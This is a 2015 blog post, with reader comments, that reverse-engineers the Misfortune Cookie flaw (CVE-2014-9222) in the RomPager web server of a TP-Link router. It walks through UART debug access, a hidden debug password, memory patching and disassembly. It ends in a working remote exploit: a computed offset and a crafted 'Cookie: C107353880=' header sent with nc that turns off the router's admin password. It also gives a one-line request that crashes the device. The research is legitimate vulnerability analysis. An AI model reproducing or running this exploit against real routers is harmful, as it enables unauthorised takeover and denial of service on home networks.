Monday, February 16, 2015

Misfortune Cookie (CVE-2014-9222) Demystified

Misfortune Cookie (CVE-2014-9222) Demystified

by cawan (cawan[at]ieee.org or chuiyewleong[at]hotmail.com)

on 16/02/2015


The misfortune cookie vulnerability has been around for a while but still lacking
an analysis which illustrate the techinical details of the vulnerability in public.
Those so called "misfortune cookie scanner" are just a simple script to retrieve
the return string at path "/Allegro" as shown below,



cawan$ curl 192.168.1.1/Allegro <html> <head> <title>Allegro Copyright</title></head><body> RomPager Advanced Version 4.07<br />(C) 1995 - 2002 Allegro Software Development Corporation</body></html>
nothing special... So, let us dig further now. I am using TD-8901N with firmware
version "TD-W8901N v1_111211". After open the housing of the router, the Tx and Rx
are labeled on the PCB to show the UART connection are available to be connected
for debugging purposes. By using an oscilloscope to probe the Tx in bootup process,
it shown the baudrate is 115200 in 3.3v. Now, attach an USB-to-UART onto it and
bootup the router again. Well, we can see the boot log in pretty detail. However,
the command interface is really restricted, nothing can make use there, as shown
below,

Copyright (c) 2001 - 2012 TP-LINK TECHNOLOGIES CO., LTD.
TP-LINK>
TP-LINK> ?
Valid commands are:
sys             exit            ether           wan            
etherdbg        tcephydbg       ip              bridge          
dot1q           pktqos          show            set            
lan                                                            
TP-LINK>

Anyway, we can stop the boot process at the zynos bootloader, as shown below,

Bootbase Version: VTC_SPI1.26 |  2012/12/26 16:00:00
RAM: Size = 8192 Kbytes
Found SPI Flash 2MiB Winbond W25Q16 at 0xbfc00000
SPI Flash Quad Enable
Turn off Quad Mode

RAS Version: 1.0.0 Build 121121 Rel.08870
System   ID: $2.12.58.23(G04.BZ.4)3.20.7.0 20120518_V003  | 2012/05/18

Press any key to enter debug mode within 3 seconds.
.......
Enter Debug Mode


In debug mode, we can use zynos commands which is AT command alike, as shown
below,

Enter Debug Mode
athe
======= Debug Command Listing =======
AT          just answer OK
ATHE          print help
ATBAx         change baudrate. 1:38.4k, 2:19.2k, 3:9.6k 4:57.6k 5:115.2k
ATENx,(y)     set BootExtension Debug Flag (y=password)
ATSE          show the seed of password generator
ATTI(h,m,s)   change system time to hour:min:sec or show current time
ATDA(y,m,d)   change system date to year/month/day or show current date
ATDS          dump RAS stack
ATDT          dump Boot Module Common Area
ATDUx,y       dump memory contents from address x for length y
ATRBx         display the  8-bit value of address x
ATRWx         display the 16-bit value of address x
ATRLx         display the 32-bit value of address x
ATGO(x)       run program at addr x or boot router
ATGR          boot router
ATGT          run Hardware Test Program
ATRTw,x,y(,z) RAM test level w, from address x to y (z iterations)
ATSH          dump manufacturer related data in ROM
ATDOx,y       download from address x for length y to PC via XMODEM
ATTD          download router configuration to PC via XMODEM
ATUR          upload router firmware to flash ROM

< press any key to continue >


According to Piotrbania [1], there is a "god mode" which should be triggered
to enable hidden commands. The hidden commands will allow us to view memory
mapping and to edit memory contents, as shown below,

ATEN1, A847D6B1
OK
athe
======= Debug Command Listing =======
AT          just answer OK
ATHE          print help
ATBAx         change baudrate. 1:38.4k, 2:19.2k, 3:9.6k 4:57.6k 5:115.2k
ATENx,(y)     set BootExtension Debug Flag (y=password)
ATSE          show the seed of password generator
ATTI(h,m,s)   change system time to hour:min:sec or show current time
ATDA(y,m,d)   change system date to year/month/day or show current date
ATDS          dump RAS stack
ATDT          dump Boot Module Common Area
ATDUx,y       dump memory contents from address x for length y
ATWBx,y       write address x with  8-bit value y
ATWWx,y       write address x with 16-bit value y
ATWLx,y       write address x with 32-bit value y
ATRBx         display the  8-bit value of address x
ATRWx         display the 16-bit value of address x
ATRLx         display the 32-bit value of address x
ATGO(x)       run program at addr x or boot router
ATGR          boot router
ATGT          run Hardware Test Program
AT%Tx         Enable Hardware Test Program at boot up
ATBTx         block0 write enable (1=enable, other=disable)

< press any key to continue >
ATRTw,x,y(,z) RAM test level w, from address x to y (z iterations)
ATWEa(,b,c,d) write MAC addr, Country code, EngDbgFlag, FeatureBit to flash ROM
ATCUx         write Country code to flash ROM
ATCB          copy from FLASH ROM to working buffer
ATCL          clear working buffer
ATSB          save working buffer to FLASH ROM
ATBU          dump manufacturer related data in working buffer
ATSH          dump manufacturer related data in ROM
ATWMx         set low 6 digits MAC address in working buffer
ATMHx         set hight 6 digits MAC address in working buffer
ATBS          show the bootbase seed of password generator
ATLBx         xmodem upload bootbase,x is password
ATSMx         set 6 digits MAC address in working buffer
ATCOx         set country code in working buffer
ATFLx         set EngDebugFlag in working buffer
ATSTx         set ROMRAS address in working buffer
ATSYx         set system type in working buffer
ATVDx         set vendor name in working buffer
ATPNx         set product name in working buffer
ATFEx,y,...   set feature bits in working buffer
ATMP          check & dump memMapTab
ATDOx,y       download from address x for length y to PC via XMODEM

< press any key to continue >
ATTD          download router configuration to PC via XMODEM
ATUPx,y       upload to RAM address x for length y from PC via XMODEM
ATUR          upload router firmware to flash ROM
ATDC          hardware version check disable during uploading firmware
ATLC          upload router configuration file to flash ROM
ATUXx(,y)     xmodem upload from flash block x to y
ATERx,y       erase flash rom from block x to y
ATWFx,y,z     copy data from addr x to flash addr y, length z
ATXSx         xmodem select: x=0: CRC mode(default); x=1: checksum mode
ATLD          Upload Configuration File and Default ROM File to Flash
ATBR              Reset to default Romfile
ATCD          Convert Running ROM File to Default ROM File into Flash

OK
atmp
                                                                                                     
ROMIO image start at bfc30000

  1: HTPCode(RAMCODE), start=80048000, len=E0000
  2: RasCode(RAMCODE), start=80048000, len=6E0000
$ROM Section:
  3: BootBas(ROMIMG), start=bfc28000, len=4000
  4: DbgArea(ROMIMG), start=bfc2c000, len=2000
  5: RomDir2(ROMDIR), start=bfc2e000, len=2000
  6: BootExt(ROMIMG), start=bfc30030, len=13FD0
  7: MemMapT(ROMMAP), start=bfc44000, len=C00
  8: HTPCode(ROMBIN), start=bfc44c00, len=8000
     (Compressed)
     Version: HTP_TC V 0.05, start: bfc44c30
     Length: 10488, Checksum: CB32
     Compressed Length: 41CF, Checksum: D5A5
  9: termcap(ROMIMG), start=bfc4cc00, len=400
 10: RomDefa(ROMIMG), start=bfc4d000, len=2000
 11: LedDefi(ROMIMG), start=bfc4f000, len=400
 12: LogoImg(ROMIMG), start=bfc4f400, len=2000
 13: LogoImg2(ROMIMG), start=bfc51400, len=2000
 14: StrImag(ROMIMG), start=bfc53400, len=32000
 15: Rt11nE2p(ROMIMG), start=bfc85400, len=400
 16: fdata(ROMBIN), start=bfc85800, len=10000
     (Compressed)
     Version: FDATA, start: bfc85830
     Length: A94C, Checksum: DCEE
     Compressed Length: 1D79, Checksum: 01BB
 17: RasCode(ROMBIN), start=bfc95800, len=192800
     (Compressed)
     Version: ADSL ATU-R, start: bfc95830
     Length: 3E7004, Checksum: 3336
     Compressed Length: 122D57, Checksum: 3612


So, we can make a summary here,

1. The very first execution is started from 0xbfc00000

To verify this, we can try this,

atgo bfc00000

Bootbase Version: VTC_SPI1.26 |  2012/12/26 16:00:00
RAM: Size = 8192 Kbytes
Found SPI Flash 2MiB Winbond W25Q16 at 0xbfc00000
SPI Flash Quad Enable
Turn off Quad Mode

RAS Version: 1.0.0 Build 121121 Rel.08870
System   ID: $2.12.58.23(G04.BZ.4)3.20.7.0 20120518_V003  | 2012/05/18

Press any key to enter debug mode within 3 seconds.
.........
Enter Debug Mode


2. The zynos bootloader is started from 0x80000000. It will be unpacked and
decompressed in the previous stage before getting executed. It is not exactly
the 14C33 image of ras as shown below,

cawan$ binwalk ras

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
61315         0xEF83          ZyXEL rom-0 configuration block, name: "dbgarea", ...
61564         0xF07C          ZyXEL rom-0 configuration block, name: "dbgarea", ...
85043         0x14C33         LZMA compressed data, properties: 0x5D ...
118036        0x1CD14         Unix path: /usr/share/tabset/vt100:\
118804        0x1D014         ZyXEL rom-0 configuration block, name: "spt.dat", ...
118824        0x1D028         ZyXEL rom-0 configuration block, name: "autoexec.net", ...
128002        0x1F402         GIF image data, version "89a", 200 x 50
136194        0x21402         GIF image data, version "89a", 560 x 50
244317        0x3BA5D         Neighborly text, "neighbor of your ADSL Router that ...
281224        0x44A88         Unix path: /I/J/L/M
328173        0x501ED         Copyright string: "Copyright (c) 2001 - 2012 TP-LINK ...
350259        0x55833         LZMA compressed data, properties: 0x5D, ...
415795        0x65833         LZMA compressed data, properties: 0x5D, ...

So, it should be dumped from memory by using atdo command.


3. The rtos which is threadx together with vulnerable allegro rompager is started
from 0x80020000. Again, it is unpacked and decompressed in the previous stage
before getting executed. Anyway, it is exactly the 65883 image being extracted
from the firmware, as shown above. Besides, the processor architecture can be
detected as below,

cawan$ binwalk --disasm --minsn=100 65833

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             MIPS executable code, 32/64-bit, big endian, ...


So, the 65883 is ready to be loaded in ida pro with 0x80020000 as base address
and MIPS big endian as processor architecture. According to Lior Oppenheim
and Shahar Tal [2], the vulnerability is due to the mis-interpretation of
"Cookie: C" header to the rompager webserver. While doing this,

cawan$ curl --header 'Cookie: C' 192.168.1.1

will cause the router get into something wrong and reboot immediately. At the
UART port, the "Kernel Panic" alike error dump is shown accordingly, as below.

TP-LINK>
TLB refill exception occured!
EPC= 0x8010E5D8
SR= 0x10000003
CR= 0xC080500C
$RA= 0x00000000
Bad Virtual Address = 0x00000000
UTLB_TLBS ..\core\sys_isr.c:267 sysreset()


        $r0= 0x00000000 $at= 0x80350000 $v0= 0x00000000 $v1= 0x00000001
        $a0= 0x00000001 $a1= 0x805D7AF8 $a2= 0xFFFFFFFF $a3= 0x00000000
        $t0= 0x8001FF80 $t1= 0xFFFFFFFE $t2= 0x804A8F38 $t3= 0x804A9E47
        $t4= 0x804A9460 $t5= 0x804A8A60 $t6= 0x804A9D00 $t7= 0x00000040
        $s0= 0x804A8A60 $s1= 0x8040C114 $s2= 0x805E2BC8 $s3= 0x80042A70
        $s4= 0x00000001 $s5= 0x8000007C $s6= 0x8040E5FC $s7= 0x00000000
        $t8= 0x804A9E48 $t9= 0x00000000 $k0= 0x00000000 $k1= 0x8000007C
        $gp= 0x8040F004 $sp= 0x805E2B60 $fp= 0x805E2BC8 $ra= 0x8003A3D0


          00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

805e2bc8: 80 5e 2b f8 80 04 2a 70 80 4e d5 ba 00 00 00 01     .^+...*p.N......
805e2bd8: 80 4e d5 ba 00 00 00 00 80 40 f8 ac 80 48 4e 29     .N.......@...HN)
805e2be8: 80 55 54 4c 42 5f 54 4c 42 53 00 ba 80 41 34 0c     .UTLB_TLBS...A4.
805e2bf8: 80 5e 2c 18 80 10 e5 e0 80 42 64 dc 80 4e d5 b9     .^,......Bd..N..
805e2c08: 80 40 f8 ac 00 00 00 00 80 40 e6 0c 80 10 dc c0     .@.......@......
805e2c18: 80 5e 2c 30 80 10 d7 38 80 40 f8 ac 00 00 00 00     .^,0...8.@......
805e2c28: 00 00 00 00 80 16 c4 28 80 5e 2c 40 80 10 ec 28     .......(.^,@...(
...
...
805e2f68: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     ................
805e2f78: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     ................
805e2f88: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     ................
805e2f98: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     ................
805e2fa8: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     ................
805e2fb8: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     ................
805e2fc8: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     ................

 current task   = httpd
 dump task      = network
 tx_stack_ptr   = 0x805D5990
 tx_stack_start = 0x805D3AF0
 tx_stack_end   = 0x805D5AEF
 tx_stack_size  = 0x00002000
 tx_run_count   = 0x00000220
          00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

805d5990: 00 00 00 00 80 5d 5a 70 80 44 2b f8 80 4a db 98     .....]Zp.D+..J..
805d59a0: 80 44 2c 8c 80 44 2c 90 80 44 2c 7c 80 44 2c 94     .D,..D,..D,|.D,.
805d59b0: 80 4a db 98 10 00 00 01 00 00 00 0a 00 00 00 00     .J..............
805d59c0: 80 1e cc ac 10 00 00 01 00 00 00 00 80 51 47 98     .............QG.
805d59d0: 00 00 00 00 00 00 05 dc 00 00 00 14 c0 a8 01 90     ................
805d59e0: 80 5d 5a 90 80 07 20 c8 80 45 23 34 00 00 00 01     .]Z... ..E#4....
805d59f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     ................
805d5a00: 00 00 00 00 80 4d ac 88 80 52 90 38 00 00 00 01     .....M...R.8....
805d5a10: c0 a8 01 90 00 00 00 01 80 5d 5a 90 80 51 47 98     .........]Z..QG.
805d5a20: 80 45 23 34 00 00 00 14 00 00 00 00 00 00 00 00     .E#4............
805d5a30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     ................
805d5a40: 00 00 00 00 00 00 00 00 00 00 00 00 c0 a8 01 01     ................
805d5a50: 10 00 00 01 80 4a db 98 00 00 00 00 00 00 00 00     .....J..........
...
...
Reserve for Print when Crash

Erasing 4K Sector...

Erasing 4K Sector...

writeRomBlock(): Erase OK!


Well, the error is occured at httpd process and the program counter is at
0x8010E5D8. Let's check the details in ida pro.

ROM:8010E5B0 loc_8010E5B0:                            # CODE XREF: sub_8010E574+EC j
ROM:8010E5B0                 li      $t7, 0x43        # 0x43='C'
ROM:8010E5B4                 bne     $v0, $t7, loc_8010E618
ROM:8010E5B8                 li      $a1, 0x3D
ROM:8010E5BC                 addiu   $s0, 1
ROM:8010E5C0                 move    $a0, $s0      
ROM:8010E5C4                 jal     sub_8016C340
ROM:8010E5C8                 nop
ROM:8010E5CC                 move    $a0, $s0      
ROM:8010E5D0                 move    $s1, $v0      
ROM:8010E5D4                 addiu   $s1, 1
ROM:8010E5D8                 jal     sub_801F2E74
ROM:8010E5DC                 sb      $zero, -1($s1)
ROM:8010E5E0                 move    $a0, $s1      
ROM:8010E5E4                 jal     sub_8016CA24
ROM:8010E5E8                 move    $s3, $v0      
ROM:8010E5EC                 li      $a2, 0x28
ROM:8010E5F0                 mul     $t2, $s3, $a2  
ROM:8010E5F4                 move    $a1, $s1      
ROM:8010E5F8                 addiu   $t5, $s4, 0x6B28
ROM:8010E5FC                 move    $s0, $v0
ROM:8010E600                 addu    $at, $s1, $s0  
ROM:8010E604                 addu    $a0, $t5, $t2  
ROM:8010E608                 jal     sub_8016A784
ROM:8010E60C                 sb      $zero, 0($at)
ROM:8010E610                 j       loc_8010E644  
ROM:8010E614                 addu    $s0, $s1, $s0
ROM:8010E618  # ---------------------------------------------------------------------------


Excellent, it is exactly the codes being mentioned in [2]. It seems the syntax
Cxxx=yyy will be interpreted as xxx being multiplied with 0x28 at ROM:8010E5F0,
and sum the result with a base address being calculated at ROM:8010E5F8, and
use the new address as the destination address to copy yyy into it at ROM:8010E608.
Hence, it allows us to perform an arbitrary overwrite here. On the other hand,
it is possible to "unlock" the router with "sys pwauthen 0", as shown below.



cawan$ curl 192.168.1.1 <html> <head> <title>Protected Object</title></head><body> <h1> Protected Object</h1> Username or Password error</body></html>
TP-LINK> sys pswauthen 0
Do not need password authentication for configuration!
TP-LINK>



cawan$ curl 192.168.1.1 <html> <head> <title> </title> </head><frameset border="0" frameborder="0" framespacing="0" rows="65,75,*"> <frame marginheight="0" marginwidth="0" name="header" noresize="" src="status.html"></frame> <frame marginheight="0" marginwidth="0" name="navigation" noresize="" src="navigation-status.html"></frame> <frame marginheight="0" marginwidth="0" name="main" noresize="" src="../status/status_deviceinfo.htm"></frame> </frameset><noframes> </noframes> </html>
So, let us find the exact location of the "unlock" byte now. By tracing the string
"Do not need password authentication for configuration!", at instruction ROM:801F9168,
it seems the "unlock" byte is located at 0x8034FF94. Now, let's confirm it. Based on
the memory dump of 0x80000000, the firmware decompression job is completed prior the
address 0x80014BC0 and jump to 0x80020000 at that address with instruction "jalr $s0".
From ida pro, we know that $at is equal to 0x80020000, if we change the instruction
at ROM:0x80014BC0 from "jalr $s0" to "sw $s0, -4($at)", then once the image being
decompressed, it will just copy the content of $s0 to 0x8001FFFC, and stop the boot
process there. So, by reading the content at 0x8001FFFC, we can know the zynos is
going to jump to 0x80020000 or somewhere else. Let's do it.

Bootbase Version: VTC_SPI1.26 |  2012/12/26 16:00:00
RAM: Size = 8192 Kbytes
Found SPI Flash 2MiB Winbond W25Q16 at 0xbfc00000
SPI Flash Quad Enable
Turn off Quad Mode

RAS Version: 1.0.0 Build 121121 Rel.08870
System   ID: $2.12.58.23(G04.BZ.4)3.20.7.0 20120518_V003  | 2012/05/18

Press any key to enter debug mode within 3 seconds.
............
Enter Debug Mode
ATEN1, A847D6B1
OK
ATWL 80014BC0, ac30fffc
OK
atgr
     (Compressed)
     Version: FDATA, start: bfc85830
     Length: A94C, Checksum: DCEE
     Compressed Length: 1D79, Checksum: 01BB
Flash data is the same!!
     (Compressed)
     Version: ADSL ATU-R, start: bfc95830
     Length: 3E7004, Checksum: 3336
     Compressed Length: 122D57, Checksum: 3612

ERROR
atrl 8001fffc
8001FFFC: 80020000


As a little reminder here, the ac30fffc is the hex of "sw $s0, -4($at)". Now, we can
confirm the base of decompressed image is located at 0x80020000. As mentioned, we
know the "unlock" byte is located at 0x8034FF94, and if we change it from 1 to 0, then
it suppose to work without password authentication. Let's try it now.

atrb 8034ff94
8034FF94: 01

OK
atwb 8034ff94,0
OK
atgo 80020000

Copyright (c) 2001 - 2006 TP-LINK TECHNOLOGIES CO., LTD
initialize ch = 0, TC2105MJ, ethernet address: 14:cc:20:57:38:2a
initialize ch = 1, ethernet address: 14:cc:20:57:38:2a
Wan Channel init ........ done
Reset dmt
Check DMT version =b2 ........
Initializing ADSL F/W ........ done
ADSL HW version: b2, HCLK 140
ok

==>natTableMemoryInit
<==natTableMemoryInitANNEXAIJLM
US bitswap on,DS bitswap on
OlrON
SRAON
Testlab 32
largeD flag=2 (0:maxD=64, 1:maxD=128, 2:maxD=511)
portreverse : on

input line: sysdisa
Erasing 4K Sector...

Erasing 4K Sector...

writeRomBlock(): Erase OK!
ble PM!
Dyingasp OFF!
dhcp address probe action is disabled
Valid Loss of power OFF!
run distributePvcFakeMac!
set try multimode number to 3 (dropmode try num 3)
Syncookie switch On!
run distributePvcFakeMac!
run distributePvcFakeMac!
run d
Erasing 4K Sector...

Erasing 4K Sector...

writeRomBlock(): Erase OK!
istributePvcFakeMac!
run distributePvcFakeMac!
run distributePvcFakeMac!
run distributePvcFakeMac!
run distributePvcFakeMac!
run distributePvcFakeMac!
Press ENTER to continue...




cawan$ curl 192.168.1.1 <html> <head> <title> </title> </head><frameset border="0" frameborder="0" framespacing="0" rows="65,75,*"> <frame marginheight="0" marginwidth="0" name="header" noresize="" src="status.html"></frame> <frame marginheight="0" marginwidth="0" name="navigation" noresize="" src="navigation-status.html"></frame> <frame marginheight="0" marginwidth="0" name="main" noresize="" src="../status/status_deviceinfo.htm"></frame> </frameset><noframes> </noframes> </html>

Excellent, it is definitely working in "unlock" mode right now. So, it is the time
to exploit the vulnerability remotely. By referring the code snippet of httpd again,
it seems we need to know the value of $s4 at ROM:8010E5F8 in order to calculate the
destination address of write operation at ROM:8010E608. We show the code snippet of
httpd again here.

ROM:8010E5B0 loc_8010E5B0:                            # CODE XREF: sub_8010E574+EC j
ROM:8010E5B0                 li      $t7, 0x43        # 0x43='C'
ROM:8010E5B4                 bne     $v0, $t7, loc_8010E618
ROM:8010E5B8                 li      $a1, 0x3D
ROM:8010E5BC                 addiu   $s0, 1
ROM:8010E5C0                 move    $a0, $s0      
ROM:8010E5C4                 jal     sub_8016C340
ROM:8010E5C8                 nop
ROM:8010E5CC                 move    $a0, $s0      
ROM:8010E5D0                 move    $s1, $v0      
ROM:8010E5D4                 addiu   $s1, 1
ROM:8010E5D8                 jal     sub_801F2E74
ROM:8010E5DC                 sb      $zero, -1($s1)
ROM:8010E5E0                 move    $a0, $s1      
ROM:8010E5E4                 jal     sub_8016CA24
ROM:8010E5E8                 move    $s3, $v0      
ROM:8010E5EC                 li      $a2, 0x28
ROM:8010E5F0                 mul     $t2, $s3, $a2  
ROM:8010E5F4                 move    $a1, $s1      
ROM:8010E5F8                 addiu   $t5, $s4, 0x6B28  # $s4 = ?
ROM:8010E5FC                 move    $s0, $v0
ROM:8010E600                 addu    $at, $s1, $s0  
ROM:8010E604                 addu    $a0, $t5, $t2  
ROM:8010E608                 jal     sub_8016A784
ROM:8010E60C                 sb      $zero, 0($at)
ROM:8010E610                 j       loc_8010E644  
ROM:8010E614                 addu    $s0, $s1, $s0
ROM:8010E618  # ---------------------------------------------------------------------------

The problem right now is how to get the value of $s4 at ROM:8010E5F8 ?
Simple, just copy the content of $s4 into a rarely use register such as $s7 and
then trigger a "kernel panic" event immediately. Let's do it now. We are going
to change,

ROM:8010E5FC                 move    $s0, $v0
ROM:8010E600                 addu    $at, $s1, $s0

to

ROM:8010E5FC                 add $s7, $s4,$zero
ROM:8010E600                 jr $zero

and the hex of these 2 instructions are,

"add $s7, $s4,$zero"   =  0x0280b820
"jr $zero"             =  0x00000008

So, let's get the $s4 value,


Bootbase Version: VTC_SPI1.26 |  2012/12/26 16:00:00
RAM: Size = 8192 Kbytes
Found SPI Flash 2MiB Winbond W25Q16 at 0xbfc00000
SPI Flash Quad Enable
Turn off Quad Mode

RAS Version: 1.0.0 Build 121121 Rel.08870
System   ID: $2.12.58.23(G04.BZ.4)3.20.7.0 20120518_V003  | 2012/05/18

Press any key to enter debug mode within 3 seconds.
.......
Enter Debug Mode
ATEN1, A847D6B1
OK
ATWL 80014BC0, ac30fffc
OK
ATGR
     (Compressed)
     Version: FDATA, start: bfc85830
     Length: A94C, Checksum: DCEE
     Compressed Length: 1D79, Checksum: 01BB
Flash data is the same!!
     (Compressed)
     Version: ADSL ATU-R, start: bfc95830
     Length: 3E7004, Checksum: 3336
     Compressed Length: 122D57, Checksum: 3612

ERROR
ATWL 8010E5FC, 0280b820
OK
ATWL 8010E600, 00000008
OK
ATGO 80020000

Copyright (c) 2001 - 2006 TP-LINK TECHNOLOGIES CO., LTD
initialize ch = 0, TC2105MJ, ethernet address: 14:cc:20:57:38:2a
initialize ch = 1, ethernet address: 14:cc:20:57:38:2a
Wan Channel init ........ done
Reset dmt
Check DMT version =b2 ........
Initializing ADSL F/W ........ done
ADSL HW version: b2, HCLK 140
ok

==>natTableMemoryInit
<==natTableMemoryInitANNEXAIJLM
US bitswap on,DS bitswap on
OlrON
SRAON
Testlab 32
largeD flag=2 (0:maxD=64, 1:maxD=128, 2:maxD=511)
portreverse : on

input line: sysdisa
Erasing 4K Sector...

Erasing 4K Sector...

writeRomBlock(): Erase OK!
ble PM!
Dyingasp OFF!
dhcp address probe action is disabled
Valid Loss of power OFF!
run distributePvcFakeMac!
set try multimode number to 3 (dropmode try num 3)
Syncookie switch On!
run distributePvcFakeMac!
run distributePvcFakeMac!
run d
Erasing 4K Sector...

Erasing 4K Sector...

writeRomBlock(): Erase OK!
istributePvcFakeMac!
run distributePvcFakeMac!
run distributePvcFakeMac!
run distributePvcFakeMac!
run distributePvcFakeMac!
run distributePvcFakeMac!
Press ENTER to continue...

Erasing 4K Sector...

Erasing 4K Sector...

writeRomBlock(): Erase OK!


Well, simply issue a cookie to the router now, and it should "kernel panic" immediately.


cawan$ curl --header 'Cookie: C9=9' 192.168.1.1

At UART port, we can see this immediately, :)


TLB refill exception occured!
EPC= 0x00000000
SR= 0x10000003
CR= 0x50805808
$RA= 0x80020000
Bad Virtual Address = 0x00000000
UTLB_TLBL ..\core\sys_isr.c:267 sysreset()


        $r0= 0x00000000 $at= 0x80350000 $v0= 0x00000000 $v1= 0x00000001
        $a0= 0x00000001 $a1= 0x805D7AF8 $a2= 0xFFFFFFFF $a3= 0x00000000
        $t0= 0x8001FF80 $t1= 0xFFFFFFFE $t2= 0x804A8F38 $t3= 0x804A9E47
        $t4= 0x804A9460 $t5= 0x804A8A60 $t6= 0x804A9D00 $t7= 0x00000040
        $s0= 0x804A8A60 $s1= 0x8040C114 $s2= 0x805E2BC8 $s3= 0x80042A70
        $s4= 0x00000001 $s5= 0x8000007C $s6= 0x8040E5FC $s7= 0x8040F8AC
        $t8= 0x804A9E48 $t9= 0x00000000 $k0= 0x00000000 $k1= 0x8000007C
        $gp= 0x8040F004 $sp= 0x805E2B60 $fp= 0x805E2BC8 $ra= 0x8003A3D0


          00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

805e2bc8: 80 5e 2b f8 80 04 2a 70 80 4e fe 1e 80 4e fe 20     .^+...*p.N...N.
805e2bd8: 80 4e fe 21 00 00 00 09 80 40 f8 ac 80 48 4e 29     .N.!.....@...HN)
805e2be8: 80 55 54 4c 42 5f 54 4c 42 4c 00 21 80 1f 2e 88     .UTLB_TLBL.!....
805e2bf8: 80 5e 2c 18 80 10 e5 ec 80 42 64 dc 80 4e fe 1d     .^,......Bd..N..
805e2c08: 80 40 f8 ac 00 00 00 00 80 40 e6 0c 80 10 dc c0     .@.......@......
805e2c18: 80 5e 2c 30 80 10 d7 38 80 40 f8 ac 00 00 00 00     .^,0...8.@......
...
...


Fine, the EPC is 0x00000000, as what we want it to be. Besides, the value of $s7
is 0x8040F8AC, which is the value of $s4 too, that we are looking for it.

Now, we know the value of $s4 is 0x8040F8AC, then the value of $t5 is 0x804163D4,
which is the base address of the calculation for destination address of write
operation. Since we need to overwrite 0x8034FF94 now, so

0x8034FF94 - 0x804163D4 = 0xFFF39BC0     # do this in dword
0xFFF39BC0 % 0x28 = 0                   # do this in qword
0xFFF39BC0 / 0x28 = 0x06661718           # do this in qword
0x06661718 = 107353880 (in decimal)

Because the address 0x8034FF94 is exactly at the first byte of 0x28 bytes aligned chunk,
then we can only overwrite the single byte with a null character (0x00). However, if we
send the specially-crafted packet to the router by using curl, it is inappropriate
because curl will padding the header with 0x0d0a0d0a. Instead, it is better to send
the specially-crafted packet with nc. By defining a specially-craft packet properly
in a file, we can just pipe it into nc and send it over the router to "unlock" the
router remotely. Let's do it now.

cawan$ cat ./cawan_header | xxd
0000000: 4745 5420 2f20 4854 5450 2f31 2e31 0a55  GET / HTTP/1.1.U
0000010: 7365 722d 4167 656e 743a 2063 7572 6c2f  ser-Agent: curl/
0000020: 372e 3333 2e30 0a48 6f73 743a 2031 3932  7.33.0.Host: 192
0000030: 2e31 3638 2e31 2e31 0a41 6363 6570 743a  .168.1.1.Accept:
0000040: 202a 2f2a 0a43 6f6f 6b69 653a 2043 3130   */*.Cookie: C10
0000050: 3733 3533 3838 303d 000a                 7353880=..



cawan$ curl 192.168.1.1 <html> <head> <title>Protected Object</title></head><body> <h1> Protected Object</h1> Username or Password error</body></html> cawan$
cawan$ cat cawan_header | nc 192.168.1.1 80
cawan$


cawan$ curl 192.168.1.1 <html> <head> <title> </title> </head><frameset border="0" frameborder="0" framespacing="0" rows="65,75,*"> <frame marginheight="0" marginwidth="0" name="header" noresize="" src="status.html"></frame> <frame marginheight="0" marginwidth="0" name="navigation" noresize="" src="navigation-status.html"></frame> <frame marginheight="0" marginwidth="0" name="main" noresize="" src="../status/status_deviceinfo.htm"></frame> </frameset><noframes> </noframes> </html> cawan$

Cool, we are done, and it seems the misfortune cookie vulnerability is really interesting.


References:

[1] http://piotrbania.com/all/articles/tplink_patch/

[2] http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf


PDF Version:-
https://www.scribd.com/doc/256266998/Misfortune-Cookie-Demystified

8 comments:

  1. Excellent article, congratulations

    I have a question, in the part: "By tracing the string "Do not need password authentication for configuration!", at instruction ROM:801F9168, it seems the "unlock" byte is located at 0x8034FF94"

    I found the string :

    ROM:803677C8 aDoNotNeedPassw:.ascii "Do not need password authentication for configuration!\r\n"<0>
    ROM:803677C8 # DATA XREF: ROM:80276620C
    ROM:80367801 .byte 0, 0, 0
    ROM:80367804 aOff_36: .ascii "off"<0> # DATA XREF: sub_80276670+8C
    ROM:80367808 aOn_30: .ascii "on"<0> # DATA XREF: sub_80276670+64C
    ROM:80367808 # sub_80276670:loc_8027672CC


    I go 80276620C

    ROM:8027660C loc_8027660C: # CODE XREF: ROM:802765DC j
    ROM:8027660C lw $a0, 4($s1)
    ROM:80276610 jal sub_8026CC20
    ROM:80276614 nop
    ROM:80276618 bnez $v0, loc_80276648
    ROM:8027661C lui $a0, 0x8036
    ROM:80276620 la $a0, aDoNotNeedPassw # "Do not need password authentication for"...
    ROM:80276624 jal sub_8003BE0C
    ROM:80276628 sb $zero, -0x7A23($gp)
    ROM:8027662C lw $ra, 0xC($sp)
    ROM:80276630 lw $s0, 0($sp)
    ROM:80276634 lw $s1, 4($sp)
    ROM:80276638 lw $fp, 8($sp)
    ROM:8027663C addiu $sp, 0x10
    ROM:80276640 jr $ra
    ROM:80276644 li $v0, 0

    But i don't know how find the unlock byte

    ReplyDelete
    Replies
    1. as i see in your code, the unlock byte is -0x7A23($gp).

      Delete
    2. This comment has been removed by the author.

      Delete
    3. Hi luis,
      same here but mine is -0x7A5F($gp)
      any progress?

      Delete
  2. Hi, great info, I have some trouble decoding the rom file with IDA, I don't have SPI/FTDI/Serial pins on my router, it's a ZTE model but uses the same Allegro RomPager, I got a rom from the ISP support page and I'm looking a way to disable the ACL option that I enabled and lost admin access on webserver, can you help me with it?

    ReplyDelete
  3. This comment has been removed by the author.

    ReplyDelete